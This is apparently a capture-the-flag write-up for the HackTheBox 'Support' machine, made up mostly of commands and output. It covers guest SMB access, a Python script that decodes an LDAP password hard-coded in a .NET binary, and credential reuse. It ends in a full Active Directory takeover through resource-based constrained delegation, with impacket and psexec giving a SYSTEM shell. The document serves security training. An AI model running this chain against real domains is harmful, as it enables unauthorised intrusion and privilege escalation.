WriteupsHTB — Support
ADEasyWindows
HTB — Support
Custom .NET info collector binary contains obfuscated LDAP password. GenericAll on DC via Resource-Based Constrained Delegation for Domain Admin.
January 23, 2025HackTheBox
#AD#RBCD#BloodHound#Kerberos
nmap
sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.10.11.174
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-23 22:09 EST
Nmap scan report for 10.10.11.174
Host is up (0.022s latency).
Not shown: 65516 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-01-24 03:13:10Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49686/tcp open msrpc Microsoft Windows RPC
49691/tcp open msrpc Microsoft Windows RPC
49712/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|2012|2016 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2022 (89%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 1m38s
| smb2-time:
| date: 2025-01-24T03:14:07
|_ start_date: N/A
TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
1 19.20 ms 10.10.14.1
2 19.27 ms 10.10.11.174
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 188.96 seconds
445
sh
445/tcp open microsoft-ds?sh
smbclient -N -L \\\\10.10.11.174 -U ''
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.174 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup availablesh
smbclient -L \\\\10.10.11.174 -U 'guest'
Password for [WORKGROUP\guest]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
support-tools Disk support staff tools
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.174 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup availablesupport-tools share
sh
smbclient \\\\10.10.11.174\\support-tools -U 'Guest'
Password for [WORKGROUP\Guest]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Jul 20 13:01:06 2022
.. D 0 Sat May 28 07:18:25 2022
7-ZipPortable_21.07.paf.exe A 2880728 Sat May 28 07:19:19 2022
npp.8.4.1.portable.x64.zip A 5439245 Sat May 28 07:19:55 2022
putty.exe A 1273576 Sat May 28 07:20:06 2022
SysinternalsSuite.zip A 48102161 Sat May 28 07:19:31 2022
UserInfo.exe.zip A 277499 Wed Jul 20 13:01:07 2022
windirstat1_1_2_setup.exe A 79171 Sat May 28 07:20:17 2022
WiresharkPortable64_3.6.5.paf.exe A 44398000 Sat May 28 07:19:43 2022sh
smb: \> mask ""
smb: \> prompt OFF
smb: \> recurse ON
smb: \> mget *UserInfo.exe
- pass this binary to dsnpy to analyze
decrypt
python
import base64
def xor_decrypt(data, key):
""" XOR each byte of data with key and return the decrypted result """
return bytes([data[i] ^ key[i % len(key)] ^ 223 for i in range(len(data))])
# Base64 encoded string
enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"
# Convert from Base64
decoded_data = base64.b64decode(enc_password)
# Key for XOR decryption (armando in ASCII)
key = bytearray("armando", 'ascii')
# XOR Decrypt
decrypted_data = xor_decrypt(decoded_data, key)
# Convert to string and display the result
decrypted_password = decrypted_data.decode('utf-8', errors='ignore')
print("Decrypted password:", decrypted_password)
sh
python3 decrypt.py
Decrypted password: nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmzsh
wine UserInfo.exe
Usage: UserInfo.exe [options] [commands]
Options:
-v|--verbose Verbose output
Commands:
find Find a user
user Get information about a usersh
./UserInfo.exe
Usage: UserInfo.exe [options] [commands]
Options:
-v|--verbose Verbose output
Commands:
find Find a user
user Get information about a user wireshark
- add
/etc/hosts
sh
10.10.11.174 support.htb
sh
./UserInfo.exe find -first test
[-] Exception: No Such Object
creds
ldap:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
sh
nxc smb 10.10.11.174 -u ldap -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'
SMB 10.10.11.174 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.174 445 DC [+] support.htb\ldap:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz sh
nxc winrm 10.10.11.174 -u ldap -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'
WINRM 10.10.11.174 5985 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:support.htb)
WINRM 10.10.11.174 5985 DC [-] support.htb\ldap:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmzusers
sh
nxc smb 10.10.11.174 -u ldap -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' --users
SMB 10.10.11.174 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.174 445 DC [+] support.htb\ldap:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
SMB 10.10.11.174 445 DC -Username- -Last PW Set- -BadPW- -Description-
SMB 10.10.11.174 445 DC Administrator 2022-07-19 17:55:56 0 Built-in account for administering the computer/domain
SMB 10.10.11.174 445 DC Guest 2022-05-28 11:18:55 0 Built-in account for guest access to the computer/domain
SMB 10.10.11.174 445 DC krbtgt 2022-05-28 11:03:43 0 Key Distribution Center Service Account
SMB 10.10.11.174 445 DC ldap 2022-05-28 11:11:46 0
SMB 10.10.11.174 445 DC support 2022-05-28 11:12:00 4
SMB 10.10.11.174 445 DC smith.rosario 2022-05-28 11:12:19 0
SMB 10.10.11.174 445 DC hernandez.stanley 2022-05-28 11:12:34 0
SMB 10.10.11.174 445 DC wilson.shelby 2022-05-28 11:12:50 0
SMB 10.10.11.174 445 DC anderson.damian 2022-05-28 11:13:05 0
SMB 10.10.11.174 445 DC thomas.raphael 2022-05-28 11:13:21 0
SMB 10.10.11.174 445 DC levine.leopoldo 2022-05-28 11:13:37 0
SMB 10.10.11.174 445 DC raven.clifton 2022-05-28 11:13:53 0
SMB 10.10.11.174 445 DC bardot.mary 2022-05-28 11:14:08 0
SMB 10.10.11.174 445 DC cromwell.gerard 2022-05-28 11:14:24 0
SMB 10.10.11.174 445 DC monroe.david 2022-05-28 11:14:39 0
SMB 10.10.11.174 445 DC west.laura 2022-05-28 11:14:55 0
SMB 10.10.11.174 445 DC langley.lucy 2022-05-28 11:15:10 0
SMB 10.10.11.174 445 DC daughtler.mabel 2022-05-28 11:15:26 0
SMB 10.10.11.174 445 DC stoll.rachelle 2022-05-28 11:15:42 0
SMB 10.10.11.174 445 DC ford.victoria 2022-05-28 11:15:58 0
SMB 10.10.11.174 445 DC [*] Enumerated 20 local users: SUPPORTtxt
Administrator
ldap
support
smith.rosario
hernandez.stanley
wilson.shelby
anderson.damian
thomas.raphael
levine.leopoldo
raven.clifton
bardot.mary
cromwell.gerard
monroe.david
west.laura
langley.lucy
daughtler.mabel
stoll.rachelle
ford.victoriabloodhound
sh
bloodhound-python -u 'ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -ns 10.10.11.174 -d support.htb -c all
zip -r support.zip *.jsonldapsearch
sh
# support, Users, support.htb
dn: CN=support,CN=Users,DC=support,DC=htb
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: support
c: US
l: Chapel Hill
st: NC
postalCode: 27514
distinguishedName: CN=support,CN=Users,DC=support,DC=htb
instanceType: 4
whenCreated: 20220528111200.0Z
whenChanged: 20220528111201.0Z
uSNCreated: 12617
info: Ironside47pleasure40Watchful
memberOf: CN=Shared Support Accounts,CN=Users,DC=support,DC=htb
memberOf: CN=Remote Management Users,CN=Builtin,DC=support,DC=htbcreds
sh
nxc smb 10.10.11.174 -u support -p 'Ironside47pleasure40Watchful'
SMB 10.10.11.174 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.174 445 DC [+] support.htb\support:Ironside47pleasure40Watchful sh
nxc winrm 10.10.11.174 -u support -p 'Ironside47pleasure40Watchful'
WINRM 10.10.11.174 5985 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:support.htb)
WINRM 10.10.11.174 5985 DC [+] support.htb\support:Ironside47pleasure40Watchful (Pwn3d!)user.txt
sh
*Evil-WinRM* PS C:\Users\support\Desktop> cat user.txt
5877732d...privilege escalation
Shared Support Account
sh
*Evil-WinRM* PS C:\users\support> net user support
User name support
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 5/28/2022 3:12:00 AM
Password expires Never
Password changeable 5/29/2022 3:12:00 AM
Password required Yes
User may change password No
Workstations allowed All
Logon script
User profile
Home directory
Last logon 1/24/2025 10:17:53 PM
Logon hours allowed All
Local Group Memberships *Remote Management Use
Global Group memberships *Shared Support Accoun*Domain Users
The command completed successfully.sh
*Evil-WinRM* PS C:\users\support> net groups "Shared Support Accounts" /domain
Group name Shared Support Accounts
Comment
Members
-------------------------------------------------------------------------------
support
The command completed successfully.Resource-Based Constrained Delegation
sh
addcomputer.py -dc-ip 10.10.11.174 -computer-name 'TestPC' -computer-pass 'Password123!' 'support.htb/support:Ironside47pleasure40Watchful'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Successfully added machine account TestPC$ with password Password123!.sh
rbcd.py -dc-ip 10.10.11.174 -delegate-from 'TestPC$' -delegate-to 'DC$' -action 'write' 'support.htb/support:Ironside47pleasure40Watchful'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] TestPC$ can now impersonate users on DC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] TestPC$ (S-1-5-21-1677581083-3380853377-188903654-5601)sh
getST.py -spn 'cifs/dc.support.htb' 'support.htb/TestPC$:Password123!' -impersonate 'Administrator' -dc-ip 10.10.11.174
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_dc.support.htb@SUPPORT.HTB.ccachesh
impacket-psexec support.htb/Administrator@dc.support.htb -k -no-pass -target-ip 10.10.11.174
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on 10.10.11.174.....
[*] Found writable share ADMIN$
[*] Uploading file YcaMgUYV.exe
[*] Opening SVCManager on 10.10.11.174.....
[*] Creating service vIQP on 10.10.11.174.....
[*] Starting service vIQP.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.859]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\systemroot.txt
sh
C:\Users\Administrator\Desktop> type root.txt
ec8c5095...Up next
MediumJan 2025
HTB — Shibboleth
IPMI 2.0 cipher 0 authentication bypass via RAKP attack dumps password hash. MariaDB CVE-2021-27928 RCE and Zabbix for lateral movement.
Read writeup
MediumJan 2025
HTB — BigBang
WordPress BuddyForms plugin SSRF for local file read. Grafana SQLite injection for credentials. Telescope log viewer arbitrary file read for root key.
Read writeup
MediumJan 2025
HTB — StreamIO
SQLi on login page, LFI reveals PHP source. MSSQL xp_cmdshell for shell. Firefox DPAPI credential decryption leads to Domain Admin via ADCS.
Read writeup